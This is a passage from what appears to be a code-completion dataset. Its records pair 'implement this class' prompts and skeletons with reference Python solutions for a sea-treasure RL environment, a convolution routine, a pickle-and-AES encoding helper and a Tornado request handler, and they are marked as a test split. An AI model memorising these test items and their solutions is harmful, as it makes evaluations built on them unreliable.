x[0][0] < columns, finals.items()))\n obstacles = frozenset()\n obstacles = obstacles.union([(0, y) for y in range(2, 11)])\n obstacles = obstacles.union([(1, y) for y in range(3, 11)])\n obstacles = obstacles.union([(2, y) for y in range(4, 11)])\n obstacles = obstacles.union([(3, y) for y in range(5, 11)])\n obstacles = obstacles.union([(4, y) for y in range(5, 11)])\n obstacles = obstacles.union([(5, y) for y in range(5, 11)])\n obstacles = obstacles.union([(6, y) for y in range(8, 11)])\n obstacles = obstacles.union([(7, y) for y in range(8, 11)])\n obstacles = obstacles.union([(8, y) for y in range(10, 11)])\n obstacles = frozenset(filter(lambda x: x[0] < columns, obstacles))\n mesh_shape = (columns, 11)\n default_reward = (-1,) + default_reward + (0,)\n default_reward = Vector(default_reward)\n super().__init__(mesh_shape=mesh_shape, seed=seed, default_reward=default_reward, initial_state=initial_state, finals=finals, obstacles=obstacles, action_space=action_space)\n<|end_body_0|>\n\n<|body_start_1|>\n reward = self.default_reward.copy()\n self.current_state = self.next_state(action=action)\n reward[1] = self.finals.get(self.current_state, self.default_reward[1])\n reward[2] = -(self.current_state[1] + 1)\n info = {}\n final = self.is_final(self.current_state)\n return (self.current_state, reward, final, info)\n<|end_body_1|>\n\n<|body_start_2|>\n reward = self.default_reward.copy()\n reward[1] = self.finals.get(next_state, self.default_reward[1])\n reward[2] = -(next_state[1] + 1)\n return reward\n<|end_body_2|>\n", "class_docstring": "", "class_name": "PressurizedBountifulSeaTreasure", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PressurizedBountifulSeaTreasure:\n\n def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None):\n \"\"\":param initial_state: Initial state where start the agent. 
:param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\"\"\"\n <|body_0|>\n\n def step(self, action: int) -> (tuple, Vector, bool, dict):\n \"\"\"Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\"\"\"\n <|body_1|>\n\n def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector:\n \"\"\"Return reward for reach `next_state` from `position` using `action`. :param state: initial position :param action: action to do :param next_state: next position reached :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n original_mesh_shape = (10, 11)\n if columns < 1 or columns > original_mesh_shape[0]:\n columns = original_mesh_shape[0]\n finals = {(0, 1): 5, (1, 2): 80, (2, 3): 120, (3, 4): 140, (4, 4): 145, (5, 4): 150, (6, 7): 163, (7, 7): 166, (8, 9): 173, (9, 10): 175}\n finals = dict(filter(lambda x: x[0][0] < columns, finals.items()))\n obstacles = frozenset()\n obstacles = obstacles.union([(0, y) for y in range(2, 11)])\n obstacles = obstacles.union([(1, y) for y in range(3, 11)])\n obstacles = obstacles.union([(2, y) for y in range(4, 11)])\n obstacles = obstacles.union([(3, y) for y in range(5, 11)])\n obstacles = obstacles.union([(4, y) for y in range(5, 11)])\n obstacles = obstacles.union([(5, y) for y in range(5, 11)])\n obstacles = obstacles.union([(6, y) for y in range(8, 11)])\n obstacles = obstacles.union([(7, y) for y in range(8, 11)])\n obstacles = obstacles.union([(8, y) for y in range(10, 11)])\n obstacles = frozenset(filter(lambda x: x[0] < columns, obstacles))\n mesh_shape = (columns, 11)\n default_reward = (-1,) + default_reward + (0,)\n default_reward = Vector(default_reward)\n super().__init__(mesh_shape=mesh_shape, seed=seed, default_reward=default_reward, initial_state=initial_state, finals=finals, obstacles=obstacles, action_space=action_space)\n<|end_body_0|>\n\n<|body_start_1|>\n reward = self.default_reward.copy()\n self.current_state = self.next_state(action=action)\n reward[1] = self.finals.get(self.current_state, self.default_reward[1])\n reward[2] = -(self.current_state[1] + 1)\n info = {}\n final = self.is_final(self.current_state)\n return (self.current_state, reward, final, info)\n<|end_body_1|>\n\n<|body_start_2|>\n reward = self.default_reward.copy()\n reward[1] = self.finals.get(next_state, self.default_reward[1])\n reward[2] = -(next_state[1] + 1)\n return reward\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000301", "length_bytes": 4453, "license_type": "no_license", "methods": [{"docstring": ":param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.", "name": "__init__", "signature": "def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None)"}, {"docstring": "Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)", "name": "step", "signature": "def step(self, action: int) -> (tuple, Vector, bool, dict)"}, {"docstring": "Return reward for reach `next_state` from `position` using `action`. 
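Editor's note on the PressurizedBountifulSeaTreasure record above: every transition yields a three-component reward of (time, treasure, pressure), where the pressure penalty grows with the diver's depth `next_state[1]`. A standalone sketch of that reward rule follows; a plain list stands in for the record's unshown `Vector` type, and only a few `finals` entries are kept.

```python
finals = {(0, 1): 5, (1, 2): 80, (2, 3): 120}   # (column, depth) -> treasure
default_reward = [-1, 0, 0]                      # (time, treasure, pressure)

def transition_reward(next_state):
    reward = list(default_reward)
    reward[1] = finals.get(next_state, default_reward[1])  # treasure if final
    reward[2] = -(next_state[1] + 1)                       # deeper -> more pressure
    return reward

print(transition_reward((1, 2)))   # [-1, 80, -3]: treasure reached at depth 2
print(transition_reward((1, 1)))   # [-1, 0, -2]: still diving
```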
:param state: initial position :param action: action to do :param next_state: next position reached :return:", "name": "transition_reward", "signature": "def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005727", "prompt": "Implement the Python class `PressurizedBountifulSeaTreasure` described below.\n\nClass description:\nImplement the PressurizedBountifulSeaTreasure class.\n\nMethod signatures and docstrings:\n- def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None): :param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\n- def step(self, action: int) -> (tuple, Vector, bool, dict): Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\n- def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector: Return reward for reach `next_state` from `position` using `action`. :param state: initial position :param action: action to do :param next_state: next position reached :return:", "prompted_full_text": "Implement the Python class `PressurizedBountifulSeaTreasure` described below.\n\nClass description:\nImplement the PressurizedBountifulSeaTreasure class.\n\nMethod signatures and docstrings:\n- def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None): :param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\n- def step(self, action: int) -> (tuple, Vector, bool, dict): Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\n- def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector: Return reward for reach `next_state` from `position` using `action`. :param state: initial position :param action: action to do :param next_state: next position reached :return:\n\n<|skeleton|>\nclass PressurizedBountifulSeaTreasure:\n\n def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None):\n \"\"\":param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\"\"\"\n <|body_0|>\n\n def step(self, action: int) -> (tuple, Vector, bool, dict):\n \"\"\"Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\"\"\"\n <|body_1|>\n\n def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector:\n \"\"\"Return reward for reach `next_state` from `position` using `action`. 
:param state: initial position :param action: action to do :param next_state: next position reached :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n original_mesh_shape = (10, 11)\n if columns < 1 or columns > original_mesh_shape[0]:\n columns = original_mesh_shape[0]\n finals = {(0, 1): 5, (1, 2): 80, (2, 3): 120, (3, 4): 140, (4, 4): 145, (5, 4): 150, (6, 7): 163, (7, 7): 166, (8, 9): 173, (9, 10): 175}\n finals = dict(filter(lambda x: x[0][0] < columns, finals.items()))\n obstacles = frozenset()\n obstacles = obstacles.union([(0, y) for y in range(2, 11)])\n obstacles = obstacles.union([(1, y) for y in range(3, 11)])\n obstacles = obstacles.union([(2, y) for y in range(4, 11)])\n obstacles = obstacles.union([(3, y) for y in range(5, 11)])\n obstacles = obstacles.union([(4, y) for y in range(5, 11)])\n obstacles = obstacles.union([(5, y) for y in range(5, 11)])\n obstacles = obstacles.union([(6, y) for y in range(8, 11)])\n obstacles = obstacles.union([(7, y) for y in range(8, 11)])\n obstacles = obstacles.union([(8, y) for y in range(10, 11)])\n obstacles = frozenset(filter(lambda x: x[0] < columns, obstacles))\n mesh_shape = (columns, 11)\n default_reward = (-1,) + default_reward + (0,)\n default_reward = Vector(default_reward)\n super().__init__(mesh_shape=mesh_shape, seed=seed, default_reward=default_reward, initial_state=initial_state, finals=finals, obstacles=obstacles, action_space=action_space)\n<|end_body_0|>\n\n<|body_start_1|>\n reward = self.default_reward.copy()\n self.current_state = self.next_state(action=action)\n reward[1] = self.finals.get(self.current_state, self.default_reward[1])\n reward[2] = -(self.current_state[1] + 1)\n info = {}\n final = self.is_final(self.current_state)\n return (self.current_state, reward, final, info)\n<|end_body_1|>\n\n<|body_start_2|>\n reward = self.default_reward.copy()\n reward[1] = self.finals.get(next_state, self.default_reward[1])\n reward[2] = -(next_state[1] + 1)\n return reward\n<|end_body_2|>\n", "revision_id": "b51c64c867e15356c9f978839fd0040182324edd", "skeleton": "<|skeleton|>\nclass PressurizedBountifulSeaTreasure:\n\n def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None):\n \"\"\":param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\"\"\"\n <|body_0|>\n\n def step(self, action: int) -> (tuple, Vector, bool, dict):\n \"\"\"Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\"\"\"\n <|body_1|>\n\n def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector:\n \"\"\"Return reward for reach `next_state` from `position` using `action`. :param state: initial position :param action: action to do :param next_state: next position reached :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PressurizedBountifulSeaTreasure:\n def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None):\n \"\"\":param initial_state: Initial state where start the agent. 
:param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\"\"\"\n original_mesh_shape = (10, 11)\n if columns < 1 or columns > original_mesh_shape[0]:\n columns = original_mesh_shape[0]\n finals = {(0, 1): 5, (1, 2): 80, (2, 3): 120, (3, 4): 140, (4, 4): 145, (5, 4): 150, (6, 7): 163, (7, 7): 166, (8, 9): 173, (9, 10): 175}\n finals = dict(filter(lambda x: x[0][0] < columns, finals.items()))\n obstacles = frozenset()\n obstacles = obstacles.union([(0, y) for y in range(2, 11)])\n obstacles = obstacles.union([(1, y) for y in range(3, 11)])\n obstacles = obstacles.union([(2, y) for y in range(4, 11)])\n obstacles = obstacles.union([(3, y) for y in range(5, 11)])\n obstacles = obstacles.union([(4, y) for y in range(5, 11)])\n obstacles = obstacles.union([(5, y) for y in range(5, 11)])\n obstacles = obstacles.union([(6, y) for y in range(8, 11)])\n obstacles = obstacles.union([(7, y) for y in range(8, 11)])\n obstacles = obstacles.union([(8, y) for y in range(10, 11)])\n obstacles = frozenset(filter(lambda x: x[0] < columns, obstacles))\n mesh_shape = (columns, 11)\n default_reward = (-1,) + default_reward + (0,)\n default_reward = Vector(default_reward)\n super().__init__(mesh_shape=mesh_shape, seed=seed, default_reward=default_reward, initial_state=initial_state, finals=finals, obstacles=obstacles, action_space=action_space)\n\n def step(self, action: int) -> (tuple, Vector, bool, dict):\n \"\"\"Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\"\"\"\n reward = self.default_reward.copy()\n self.current_state = self.next_state(action=action)\n reward[1] = self.finals.get(self.current_state, self.default_reward[1])\n reward[2] = -(self.current_state[1] + 1)\n info = {}\n final = self.is_final(self.current_state)\n return (self.current_state, reward, final, info)\n\n def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector:\n \"\"\"Return reward for reach `next_state` from `position` using `action`. 
:param state: initial position :param action: action to do :param next_state: next position reached :return:\"\"\"\n reward = self.default_reward.copy()\n reward[1] = self.finals.get(next_state, self.default_reward[1])\n reward[2] = -(next_state[1] + 1)\n return reward\n", "source": "the_stack_v2_python_sparse", "source_path": "environments/pressurized_bountiful_sea_treasure.py", "source_repo": "Pozas91/tiadas", "split": "test", "star_events_count": 1} {"blob_id": "60782add4eab9020f5eeb94e8d669daff1d8dc72", "bodies": ["if padding:\n for item in input:\n item.insert(0, 0)\n item.append(0)\n z = [0] * len(input[0])\n input.insert(0, z)\n input.append(z)\ni_h = len(input)\ni_w = len(input[0])\nf_h = len(filter)\nf_w = len(filter[0])\nif (i_h - f_h) % stride != 0:\n print('!!请重新分配padding的长度')\n return\nif (i_w - f_w) % stride != 0:\n print('请重新分配padding的长度')\n return\nres = []\nfor i in range(0, i_h - f_h + stride, stride):\n sub_res = []\n for j in range(0, i_w - f_w + stride, stride):\n sub_res.append(self.sum(input, i, j, filter))\n res.append(sub_res)\nreturn res", "f_h = len(filter)\nf_w = len(filter[0])\nres = 0\nfor i in range(0, f_h):\n for j in range(0, f_w):\n res += input[row + i][col + j] * filter[i][j]\nreturn res"], "bodies_text": "<|body_start_0|>\n if padding:\n for item in input:\n item.insert(0, 0)\n item.append(0)\n z = [0] * len(input[0])\n input.insert(0, z)\n input.append(z)\n i_h = len(input)\n i_w = len(input[0])\n f_h = len(filter)\n f_w = len(filter[0])\n if (i_h - f_h) % stride != 0:\n print('!!请重新分配padding的长度')\n return\n if (i_w - f_w) % stride != 0:\n print('请重新分配padding的长度')\n return\n res = []\n for i in range(0, i_h - f_h + stride, stride):\n sub_res = []\n for j in range(0, i_w - f_w + stride, stride):\n sub_res.append(self.sum(input, i, j, filter))\n res.append(sub_res)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n f_h = len(filter)\n f_w = len(filter[0])\n res = 0\n for i in range(0, f_h):\n for j in range(0, f_w):\n res += input[row + i][col + j] * filter[i][j]\n return res\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def test(self, input, filter, padding, stride):\n \"\"\"input为输入矩阵,filter为卷积核,返回卷积之后的结果\"\"\"\n <|body_0|>\n\n def sum(self, input, row, col, filter):\n \"\"\"row,col为卷积操作在input的起始位置\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if padding:\n for item in input:\n item.insert(0, 0)\n item.append(0)\n z = [0] * len(input[0])\n input.insert(0, z)\n input.append(z)\n i_h = len(input)\n i_w = len(input[0])\n f_h = len(filter)\n f_w = len(filter[0])\n if (i_h - f_h) % stride != 0:\n print('!!请重新分配padding的长度')\n return\n if (i_w - f_w) % stride != 0:\n print('请重新分配padding的长度')\n return\n res = []\n for i in range(0, i_h - f_h + stride, stride):\n sub_res = []\n for j in range(0, i_w - f_w + stride, stride):\n sub_res.append(self.sum(input, i, j, filter))\n res.append(sub_res)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n f_h = len(filter)\n f_w = len(filter[0])\n res = 0\n for i in range(0, f_h):\n for j in range(0, f_w):\n res += input[row + i][col + j] * filter[i][j]\n return res\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000302", "length_bytes": 1599, "license_type": "no_license", "methods": [{"docstring": "input为输入矩阵,filter为卷积核,返回卷积之后的结果", "name": "test", "signature": "def test(self, input, filter, padding, stride)"}, {"docstring": 
"row,col为卷积操作在input的起始位置", "name": "sum", "signature": "def sum(self, input, row, col, filter)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000017", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def test(self, input, filter, padding, stride): input为输入矩阵,filter为卷积核,返回卷积之后的结果\n- def sum(self, input, row, col, filter): row,col为卷积操作在input的起始位置", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def test(self, input, filter, padding, stride): input为输入矩阵,filter为卷积核,返回卷积之后的结果\n- def sum(self, input, row, col, filter): row,col为卷积操作在input的起始位置\n\n<|skeleton|>\nclass Solution:\n\n def test(self, input, filter, padding, stride):\n \"\"\"input为输入矩阵,filter为卷积核,返回卷积之后的结果\"\"\"\n <|body_0|>\n\n def sum(self, input, row, col, filter):\n \"\"\"row,col为卷积操作在input的起始位置\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if padding:\n for item in input:\n item.insert(0, 0)\n item.append(0)\n z = [0] * len(input[0])\n input.insert(0, z)\n input.append(z)\n i_h = len(input)\n i_w = len(input[0])\n f_h = len(filter)\n f_w = len(filter[0])\n if (i_h - f_h) % stride != 0:\n print('!!请重新分配padding的长度')\n return\n if (i_w - f_w) % stride != 0:\n print('请重新分配padding的长度')\n return\n res = []\n for i in range(0, i_h - f_h + stride, stride):\n sub_res = []\n for j in range(0, i_w - f_w + stride, stride):\n sub_res.append(self.sum(input, i, j, filter))\n res.append(sub_res)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n f_h = len(filter)\n f_w = len(filter[0])\n res = 0\n for i in range(0, f_h):\n for j in range(0, f_w):\n res += input[row + i][col + j] * filter[i][j]\n return res\n<|end_body_1|>\n", "revision_id": "ef6aee94c7990d734271c204034ec273b665226d", "skeleton": "<|skeleton|>\nclass Solution:\n\n def test(self, input, filter, padding, stride):\n \"\"\"input为输入矩阵,filter为卷积核,返回卷积之后的结果\"\"\"\n <|body_0|>\n\n def sum(self, input, row, col, filter):\n \"\"\"row,col为卷积操作在input的起始位置\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def test(self, input, filter, padding, stride):\n \"\"\"input为输入矩阵,filter为卷积核,返回卷积之后的结果\"\"\"\n if padding:\n for item in input:\n item.insert(0, 0)\n item.append(0)\n z = [0] * len(input[0])\n input.insert(0, z)\n input.append(z)\n i_h = len(input)\n i_w = len(input[0])\n f_h = len(filter)\n f_w = len(filter[0])\n if (i_h - f_h) % stride != 0:\n print('!!请重新分配padding的长度')\n return\n if (i_w - f_w) % stride != 0:\n print('请重新分配padding的长度')\n return\n res = []\n for i in range(0, i_h - f_h + stride, stride):\n sub_res = []\n for j in range(0, i_w - f_w + stride, stride):\n sub_res.append(self.sum(input, i, j, filter))\n res.append(sub_res)\n return res\n\n def sum(self, input, row, col, filter):\n \"\"\"row,col为卷积操作在input的起始位置\"\"\"\n f_h = len(filter)\n f_w = len(filter[0])\n res = 0\n for i in range(0, f_h):\n for j in range(0, f_w):\n res += input[row + i][col + j] * filter[i][j]\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "卷积操作.py", "source_repo": "godzzbboss/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "17af770d19b13bf3966e0867d49c3280d13c0059", "bodies": ["try:\n code = pickle.dumps(activity_compile)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = 
code + '=' * (16 - len(code) % 16)\n code = obj.encrypt(code)\n code = base64.urlsafe_b64encode(code)\n return code\nexcept Exception as e:\n logging.error('encrypt_activity_compile_to_code error')\n logging.error(e)\n return ''", "code = str(code)\ntry:\n code = base64.urlsafe_b64decode(code)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = obj.decrypt(code)\n code = code.rstrip('=')\n activity_compile = pickle.loads(code)\n return activity_compile\nexcept Exception as e:\n logging.error('decrypt_code_to_activity_compile error')\n logging.error(e)\n return None"], "bodies_text": "<|body_start_0|>\n try:\n code = pickle.dumps(activity_compile)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = code + '=' * (16 - len(code) % 16)\n code = obj.encrypt(code)\n code = base64.urlsafe_b64encode(code)\n return code\n except Exception as e:\n logging.error('encrypt_activity_compile_to_code error')\n logging.error(e)\n return ''\n<|end_body_0|>\n\n<|body_start_1|>\n code = str(code)\n try:\n code = base64.urlsafe_b64decode(code)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = obj.decrypt(code)\n code = code.rstrip('=')\n activity_compile = pickle.loads(code)\n return activity_compile\n except Exception as e:\n logging.error('decrypt_code_to_activity_compile error')\n logging.error(e)\n return None\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ActivityCompile", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ActivityCompile:\n\n def encrypt_activity_compile_to_code(activity_compile):\n \"\"\"deprecated later\"\"\"\n <|body_0|>\n\n def decrypt_code_to_activity_compile(code):\n \"\"\"deprecated later\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n code = pickle.dumps(activity_compile)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = code + '=' * (16 - len(code) % 16)\n code = obj.encrypt(code)\n code = base64.urlsafe_b64encode(code)\n return code\n except Exception as e:\n logging.error('encrypt_activity_compile_to_code error')\n logging.error(e)\n return ''\n<|end_body_0|>\n\n<|body_start_1|>\n code = str(code)\n try:\n code = base64.urlsafe_b64decode(code)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = obj.decrypt(code)\n code = code.rstrip('=')\n activity_compile = pickle.loads(code)\n return activity_compile\n except Exception as e:\n logging.error('decrypt_code_to_activity_compile error')\n logging.error(e)\n return None\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000303", "length_bytes": 1840, "license_type": "no_license", "methods": [{"docstring": "deprecated later", "name": "encrypt_activity_compile_to_code", "signature": "def encrypt_activity_compile_to_code(activity_compile)"}, {"docstring": "deprecated later", "name": "decrypt_code_to_activity_compile", "signature": "def decrypt_code_to_activity_compile(code)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003637", "prompt": "Implement the Python class `ActivityCompile` described below.\n\nClass description:\nImplement the ActivityCompile class.\n\nMethod signatures and docstrings:\n- def encrypt_activity_compile_to_code(activity_compile): deprecated later\n- def decrypt_code_to_activity_compile(code): deprecated later", "prompted_full_text": "Implement the Python class `ActivityCompile` described below.\n\nClass description:\nImplement the ActivityCompile class.\n\nMethod signatures and docstrings:\n- def encrypt_activity_compile_to_code(activity_compile): deprecated later\n- def 
decrypt_code_to_activity_compile(code): deprecated later\n\n<|skeleton|>\nclass ActivityCompile:\n\n def encrypt_activity_compile_to_code(activity_compile):\n \"\"\"deprecated later\"\"\"\n <|body_0|>\n\n def decrypt_code_to_activity_compile(code):\n \"\"\"deprecated later\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n code = pickle.dumps(activity_compile)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = code + '=' * (16 - len(code) % 16)\n code = obj.encrypt(code)\n code = base64.urlsafe_b64encode(code)\n return code\n except Exception as e:\n logging.error('encrypt_activity_compile_to_code error')\n logging.error(e)\n return ''\n<|end_body_0|>\n\n<|body_start_1|>\n code = str(code)\n try:\n code = base64.urlsafe_b64decode(code)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = obj.decrypt(code)\n code = code.rstrip('=')\n activity_compile = pickle.loads(code)\n return activity_compile\n except Exception as e:\n logging.error('decrypt_code_to_activity_compile error')\n logging.error(e)\n return None\n<|end_body_1|>\n", "revision_id": "0cd69ba5bf3c962c491fb7a814539929112def8f", "skeleton": "<|skeleton|>\nclass ActivityCompile:\n\n def encrypt_activity_compile_to_code(activity_compile):\n \"\"\"deprecated later\"\"\"\n <|body_0|>\n\n def decrypt_code_to_activity_compile(code):\n \"\"\"deprecated later\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ActivityCompile:\n def encrypt_activity_compile_to_code(activity_compile):\n \"\"\"deprecated later\"\"\"\n try:\n code = pickle.dumps(activity_compile)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = code + '=' * (16 - len(code) % 16)\n code = obj.encrypt(code)\n code = base64.urlsafe_b64encode(code)\n return code\n except Exception as e:\n logging.error('encrypt_activity_compile_to_code error')\n logging.error(e)\n return ''\n\n def decrypt_code_to_activity_compile(code):\n \"\"\"deprecated later\"\"\"\n code = str(code)\n try:\n code = base64.urlsafe_b64decode(code)\n obj = AES.new(AES_KEY, AES.MODE_ECB)\n code = obj.decrypt(code)\n code = code.rstrip('=')\n activity_compile = pickle.loads(code)\n return activity_compile\n except Exception as e:\n logging.error('decrypt_code_to_activity_compile error')\n logging.error(e)\n return None\n", "source": "the_stack_v2_python_sparse", "source_path": "app/models/activity_compile.py", "source_repo": "flyakite/tracker", "split": "test", "star_events_count": 0} {"blob_id": "cd16117b7faee71f063c9cbe25eb48eaec6c1a2d", "bodies": ["username = self.get_cookie('username')\npage = int(self.get_argument('page', 1))\nsearchKey = self.get_argument('searchKey', None)\npagesize = int(self.get_argument('pagesize', self._PageSize))\ntotalquery = self.db.query(ReadyReleaseServer.Id)\nNgReleaseObj = self.db.query(ReadyReleaseServer)\nif searchKey:\n totalquery = totalquery.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n NgReleaseObj = NgReleaseObj.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\nself.Result['total'] = totalquery.count()\nserverTask = NgReleaseObj.order_by(desc(ReadyReleaseServer.Id)).limit(pagesize).offset((page - 1) * pagesize).all()\nself.Result['rows'] = list(map(lambda obj: obj.toDict(), 
serverTask))\nself.Result['username'] = username\nself.finish(self.Result)", "data = json.loads(self.request.body.decode('utf-8'))\nobjTask = ReadyReleaseServer()\ndomainname = data['params'].get('DomainName', None)\nobjTask.name = ''.join(domainname.split('-'))\nobjTask.DomainName = domainname + '.pdyf.open.com.cn'\nobjTask.HealthExam = data['params'].get('HealthExam', None)\nobjTask.Port = int(data['params'].get('Port', None))\nobjTask.Publisher = self.get_cookie('username')\nself.db.add(objTask)\nself.db.commit()\ntasks.ready_Release.delay(objTask.name, objTask.Port, domainname, objTask.HealthExam)\nself.Result['rows'] = 1\nself.Result['info'] = u'创建成功'\nself.finish(self.Result)", "pro = self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).first()\ndomainname = pro.DomainName.split('.')[0]\ntasks.ready_Release_del.delay(domainname)\nself.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).delete()\nself.db.commit()\nself.Result['info'] = u'删除nginx及consul成功'\nself.finish(self.Result)"], "bodies_text": "<|body_start_0|>\n username = self.get_cookie('username')\n page = int(self.get_argument('page', 1))\n searchKey = self.get_argument('searchKey', None)\n pagesize = int(self.get_argument('pagesize', self._PageSize))\n totalquery = self.db.query(ReadyReleaseServer.Id)\n NgReleaseObj = self.db.query(ReadyReleaseServer)\n if searchKey:\n totalquery = totalquery.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n NgReleaseObj = NgReleaseObj.filter(or_(ReadyReleaseServer.DomainName.like('%%%s%%' % searchKey), ReadyReleaseServer.HealthExam.like('%%%s%%' % searchKey), ReadyReleaseServer.Port.like('%%%s%%' % searchKey)))\n self.Result['total'] = totalquery.count()\n serverTask = NgReleaseObj.order_by(desc(ReadyReleaseServer.Id)).limit(pagesize).offset((page - 1) * pagesize).all()\n self.Result['rows'] = list(map(lambda obj: obj.toDict(), serverTask))\n self.Result['username'] = username\n self.finish(self.Result)\n<|end_body_0|>\n\n<|body_start_1|>\n data = json.loads(self.request.body.decode('utf-8'))\n objTask = ReadyReleaseServer()\n domainname = data['params'].get('DomainName', None)\n objTask.name = ''.join(domainname.split('-'))\n objTask.DomainName = domainname + '.pdyf.open.com.cn'\n objTask.HealthExam = data['params'].get('HealthExam', None)\n objTask.Port = int(data['params'].get('Port', None))\n objTask.Publisher = self.get_cookie('username')\n self.db.add(objTask)\n self.db.commit()\n tasks.ready_Release.delay(objTask.name, objTask.Port, domainname, objTask.HealthExam)\n self.Result['rows'] = 1\n self.Result['info'] = u'创建成功'\n self.finish(self.Result)\n<|end_body_1|>\n\n<|body_start_2|>\n pro = self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).first()\n domainname = pro.DomainName.split('.')[0]\n tasks.ready_Release_del.delay(domainname)\n self.db.query(ReadyReleaseServer).filter(ReadyReleaseServer.Id == ident).delete()\n self.db.commit()\n self.Result['info'] = u'删除nginx及consul成功'\n self.finish(self.Result)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "ReadyHandler", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", 